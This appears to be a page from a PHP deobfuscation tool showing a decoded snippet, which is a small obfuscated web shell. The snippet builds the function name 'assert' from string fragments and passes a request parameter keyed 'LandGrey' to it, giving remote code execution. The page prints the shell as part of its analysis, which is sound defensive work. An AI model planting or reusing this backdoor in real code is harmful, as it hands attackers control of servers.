Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $password = "LandGrey"; $ch = explode(".","hello.ass.world.er.t"); register_shutd..
Decoded Output download
<?php
$password = "LandGrey";
$ch = explode(".","hello.ass.world.er.t");
register_shutdown_function($ch[1].$ch[3].$ch[4], $_REQUEST[$password]);
?>
Did this file decode correctly?
Original Code
<?php
$password = "LandGrey";
$ch = explode(".","hello.ass.world.er.t");
register_shutdown_function($ch[1].$ch[3].$ch[4], $_REQUEST[$password]);
?>
Function Calls
explode | 1 |
register_shutdown_function | 1 |
Stats
MD5 | 4ab81d0f415ec472523e070e952c4c9d |
Eval Count | 0 |
Decode Time | 94 ms |